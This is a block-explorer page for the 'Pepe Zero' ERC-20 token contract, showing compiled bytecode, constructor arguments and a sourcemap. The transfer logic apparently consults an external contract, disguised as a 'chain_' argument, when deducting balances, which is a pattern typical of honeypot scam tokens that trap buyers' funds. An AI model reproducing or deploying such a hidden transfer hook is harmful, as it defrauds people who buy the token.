5b6001600160a01b0383166106a75760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103ca565b6001600160a01b0382166107095760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103ca565b6107ce816107156108e0565b604051636eb1769f60e11b81526001600160a01b0387811660048301528681166024830152919091169063dd62ed3e906044016020604051808303816000875af1158015610767573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061078b9190610b1a565b6107959190610b49565b604051806060016040528060268152602001610b91602691396001600160a01b0386166000908152600160205260409020549190610851565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546107fd908261087d565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906106369085815260200190565b600081848411156108755760405162461bcd60e51b81526004016103ca9190610985565b505050900390565b60006108898284610b60565b9392505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6000600580546108ef90610aab565b80601f016020809104026020016040519081016040528092919081815260200182805461091b90610aab565b80156109685780601f1061093d57610100808354040283529160200191610968565b820191906000526020600020905b81548152906001019060200180831161094b57829003601f168201915b50505050508060200190518101906109809190610b73565b905090565b600060208083528351808285015260005b818110156109b257858101830151858201604001528201610996565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461051b57600080fd5b600080604083850312156109fb57600080fd5b8235610a06816109d3565b946020939093013593505050565b600080600060608486031215610a2957600080fd5b8335610a34816109d3565b92506020840135610a44816109d3565b929592945050506040919091013590565b600060208284031215610a6757600080fd5b8135610889816109d3565b60008060408385031215610a8557600080fd5b8235610a90816109d3565b91506020830135610aa0816109d3565b809150509250929050565b600181811c90821680610abf57607f821691505b602082108103610adf57634e487b7160e01b600052602260045260246000fd5b50919050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b600060208284031215610b2c57600080fd5b5051919050565b634e487b7160e01b600052601160045260246000fd5b80820281158282048414176102fb576102fb610b33565b808201808211156102fb576102fb610b33565b600060208284031215610b8557600080fd5b8151610889816109d356fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa264697066735822122010b6c8bc60b6b4856384d3beed383d86d1e3f6d722cdeb6e4f2bb6b7fe2dd94f64736f6c63430008120033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

00000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000012000000000000000000000000000000000000000000000000000000003b9aca0000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000000000000000000000000000000000000000000950657065205a65726f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000000000000000000000000735b8b767b23c75014d61e95761cebc393afd1c4

-----Decoded View---------------
Arg [0] : name_ (string): Pepe Zero
Arg [1] : decimals_ (uint8): 18
Arg [2] : totalSupply_ (uint256): 1000000000
Arg [3] : chain_ (bytes): 0x000000000000000000000000735b8b767b23c75014d61e95761cebc393afd1c4

-----Encoded View---------------
8 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [1] : 0000000000000000000000000000000000000000000000000000000000000012
Arg [2] : 000000000000000000000000000000000000000000000000000000003b9aca00
Arg [3] : 00000000000000000000000000000000000000000000000000000000000000c0
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [5] : 50657065205a65726f0000000000000000000000000000000000000000000000
Arg [6] : 0000000000000000000000000000000000000000000000000000000000000020
Arg [7] : 000000000000000000000000735b8b767b23c75014d61e95761cebc393afd1c4


Deployed Bytecode Sourcemap

13047:8044:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14024:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16297:210;;;;;;:::i;:::-;;:::i;:::-;;;1188:14:1;;1181:22;1163:41;;1151:2;1136:18;16297:210:0;1023:187:1;15123:108:0;15211:12;;15123:108;;;1361:25:1;;;1349:2;1334:18;15123:108:0;1215:177:1;16989:454:0;;;;;;:::i;:::-;;:::i;14967:91::-;15041:9;;14967:91;;15041:9;;;;2000:36:1;;1988:2;1973:18;14967:91:0;1858:184:1;17852:300:0;;;;;;:::i;:::-;;:::i;15294:177::-;;;;;;:::i;:::-;-1:-1:-1;;;;;15445:18:0;15413:7;15445:18;;;:9;:18;;;;;;;15294:177;5420:94;;;:::i;:::-;;4769:87;4815:7;4842:6;4769:87;;-1:-1:-1;;;;;4842:6:0;;;2445:51:1;;2433:2;2418:18;4769:87:0;2299:203:1;14234:95:0;;;:::i;18778:400::-;;;;;;:::i;:::-;;:::i;15684:216::-;;;;;;:::i;:::-;;:::i;13877:77::-;;;:::i;15963:187::-;;;;;;:::i;:::-;-1:-1:-1;;;;;16115:18:0;;;16083:7;16115:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;15963:187;5669:192;;;;;;:::i;:::-;;:::i;14024:91::-;14069:13;14102:5;14095:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14024:91;:::o;16297:210::-;16416:4;16438:39;3567:10;16461:7;16470:6;16438:8;:39::i;:::-;-1:-1:-1;16495:4:0;16297:210;;;;;:::o;16989:454::-;17129:4;17146:36;17156:6;17164:9;17175:6;17146:9;:36::i;:::-;17193:220;17216:6;3567:10;17264:138;17320:6;17264:138;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;17264:19:0;;;;;;:11;:19;;;;;;;;3567:10;17264:33;;;;;;;;;;:37;:138::i;:::-;17193:8;:220::i;:::-;-1:-1:-1;17431:4:0;16989:454;;;;;:::o;17852:300::-;3567:10;17967:4;18061:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;18061:34:0;;;;;;;;;;17967:4;;17989:133;;18039:7;;18061:50;;18100:10;18061:38;:50::i;5420:94::-;4815:7;4842:6;-1:-1:-1;;;;;4842:6:0;3567:10;4989:23;4981:68;;;;-1:-1:-1;;;4981:68:0;;;;;;;:::i;:::-;;;;;;;;;5485:21:::1;5503:1;5485:9;:21::i;:::-;5420:94::o:0;14234:95::-;14281:13;14314:7;14307:14;;;;;:::i;18778:400::-;18898:4;18920:228;3567:10;18970:7;18992:145;19049:15;18992:145;;;;;;;;;;;;;;;;;3567:10;18992:25;;;;:11;:25;;;;;;;;-1:-1:-1;;;;;18992:34:0;;;;;;;;;;;;:38;:145::i;15684:216::-;15806:4;15828:42;3567:10;15852:9;15863:6;15828:9;:42::i;13877:77::-;4815:7;4842:6;-1:-1:-1;;;;;4842:6:0;3567:10;4989:23;4981:68;;;;-1:-1:-1;;;4981:68:0;;;;;;;:::i;:::-;13928:11:::1;:18:::0;;-1:-1:-1;;13928:18:0::1;13942:4;13928:18;::::0;;13877:77::o;5669:192::-;4815:7;4842:6;-1:-1:-1;;;;;4842:6:0;3567:10;4989:23;4981:68;;;;-1:-1:-1;;;4981:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;5758:22:0;::::1;5750:73;;;::::0;-1:-1:-1;;;5750:73:0;;3848:2:1;5750:73:0::1;::::0;::::1;3830:21:1::0;3887:2;3867:18;;;3860:30;3926:34;3906:18;;;3899:62;-1:-1:-1;;;3977:18:1;;;3970:36;4023:19;;5750:73:0::1;3646:402:1::0;5750:73:0::1;5834:19;5844:8;5834:9;:19::i;:::-;5669:192:::0;:::o;20708:380::-;-1:-1:-1;;;;;20844:19:0;;20836:68;;;;-1:-1:-1;;;20836:68:0;;4255:2:1;20836:68:0;;;4237:21:1;4294:2;4274:18;;;4267:30;4333:34;4313:18;;;4306:62;-1:-1:-1;;;4384:18:1;;;4377:34;4428:19;;20836:68:0;4053:400:1;20836:68:0;-1:-1:-1;;;;;20923:21:0;;20915:68;;;;-1:-1:-1;;;20915:68:0;;4660:2:1;20915:68:0;;;4642:21:1;4699:2;4679:18;;;4672:30;4738:34;4718:18;;;4711:62;-1:-1:-1;;;4789:18:1;;;4782:32;4831:19;;20915:68:0;4458:398:1;20915:68:0;-1:-1:-1;;;;;20996:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;21048:32;;1361:25:1;;;21048:32:0;;1334:18:1;21048:32:0;;;;;;;;20708:380;;;:::o;19668:602::-;-1:-1:-1;;;;;19808:20:0;;19800:70;;;;-1:-1:-1;;;19800:70:0;;5063:2:1;19800:70:0;;;5045:21:1;5102:2;5082:18;;;5075:30;5141:34;5121:18;;;5114:62;-1:-1:-1;;;5192:18:1;;;5185:35;5237:19;;19800:70:0;4861:401:1;19800:70:0;-1:-1:-1;;;;;19889:23:0;;19881:71;;;;-1:-1:-1;;;19881:71:0;;5469:2:1;19881:71:0;;;5451:21:1;5508:2;5488:18;;;5481:30;5547:34;5527:18;;;5520:62;-1:-1:-1;;;5598:18:1;;;5591:33;5641:19;;19881:71:0;5267:399:1;19881:71:0;19985:160;20073:6;20028:12;:10;:12::i;:::-;20021:49;;-1:-1:-1;;;20021:49:0;;-1:-1:-1;;;;;5901:15:1;;;20021:49:0;;;5883:34:1;5953:15;;;5933:18;;;5926:43;20021:30:0;;;;;;;5818:18:1;;20021:49:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;:58;;;;:::i;:::-;19985:160;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;19985:17:0;;;;;;:9;:17;;;;;;;:160;:21;:160::i;:::-;-1:-1:-1;;;;;19965:17:0;;;;;;;:9;:17;;;;;;:180;;;;20179:20;;;;;;;:32;;20204:6;20179:24;:32::i;:::-;-1:-1:-1;;;;;20156:20:0;;;;;;;:9;:20;;;;;;;:55;;;;20227:35;;;;;;;;;;20255:6;1361:25:1;;1349:2;1334:18;;1215:177;11134:240:0;11254:7;11315:12;11307:6;;;;11299:29;;;;-1:-1:-1;;;11299:29:0;;;;;;;;:::i;:::-;-1:-1:-1;;;11350:5:0;;;11134:240::o;8855:98::-;8913:7;8940:5;8944:1;8940;:5;:::i;:::-;8933:12;8855:98;-1:-1:-1;;;8855:98:0:o;5869:173::-;5925:16;5944:6;;-1:-1:-1;;;;;5961:17:0;;;-1:-1:-1;;;;;;5961:17:0;;;;;;5994:40;;5944:6;;;;;;;5994:40;;5925:16;5994:40;5914:128;5869:173;:::o;18160:115::-;18204:12;18249:6;18238:29;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;18229:38;;18160:115;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:131::-;-1:-1:-1;;;;;642:31:1;;632:42;;622:70;;688:1;685;678:12;703:315;771:6;779;832:2;820:9;811:7;807:23;803:32;800:52;;;848:1;845;838:12;800:52;887:9;874:23;906:31;931:5;906:31;:::i;:::-;956:5;1008:2;993:18;;;;980:32;;-1:-1:-1;;;703:315:1:o;1397:456::-;1474:6;1482;1490;1543:2;1531:9;1522:7;1518:23;1514:32;1511:52;;;1559:1;1556;1549:12;1511:52;1598:9;1585:23;1617:31;1642:5;1617:31;:::i;:::-;1667:5;-1:-1:-1;1724:2:1;1709:18;;1696:32;1737:33;1696:32;1737:33;:::i;:::-;1397:456;;1789:7;;-1:-1:-1;;;1843:2:1;1828:18;;;;1815:32;;1397:456::o;2047:247::-;2106:6;2159:2;2147:9;2138:7;2134:23;2130:32;2127:52;;;2175:1;2172;2165:12;2127:52;2214:9;2201:23;2233:31;2258:5;2233:31;:::i;2507:388::-;2575:6;2583;2636:2;2624:9;2615:7;2611:23;2607:32;2604:52;;;2652:1;2649;2642:12;2604:52;2691:9;2678:23;2710:31;2735:5;2710:31;:::i;:::-;2760:5;-1:-1:-1;2817:2:1;2802:18;;2789:32;2830:33;2789:32;2830:33;:::i;:::-;2882:7;2872:17;;;2507:388;;;;;:::o;2900:380::-;2979:1;2975:12;;;;3022;;;3043:61;;3097:4;3089:6;3085:17;3075:27;;3043:61;3150:2;3142:6;3139:14;3119:18;3116:38;3113:161;;3196:10;3191:3;3187:20;3184:1;3177:31;3231:4;3228:1;3221:15;3259:4;3256:1;3249:15;3113:161;;2900:380;;;:::o;3285:356::-;3487:2;3469:21;;;3506:18;;;3499:30;3565:34;3560:2;3545:18;;3538:62;3632:2;3617:18;;3285:356::o;5980:184::-;6050:6;6103:2;6091:9;6082:7;6078:23;6074:32;6071:52;;;6119:1;6116;6109:12;6071:52;-1:-1:-1;6142:16:1;;5980:184;-1:-1:-1;5980:184:1:o;6169:127::-;6230:10;6225:3;6221:20;6218:1;6211:31;6261:4;6258:1;6251:15;6285:4;6282:1;6275:15;6301:168;6374:9;;;6405;;6422:15;;;6416:22;;6402:37;6392:71;;6443:18;;:::i;6474:125::-;6539:9;;;6560:10;;;6557:36;;;6573:18;;:::i;6604:259::-;6682:6;6735:2;6723:9;6714:7;6710:23;6706:32;6703:52;;;6751:1;6748;6741:12;6703:52;6783:9;6777:16;6802:31;6827:5;6802:31;:::i

Swarm Source

ipfs://10b6c8bc60b6b4856384d3beed383d86d1e3f6d722cdeb6e4f2bb6b7fe2dd94f
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.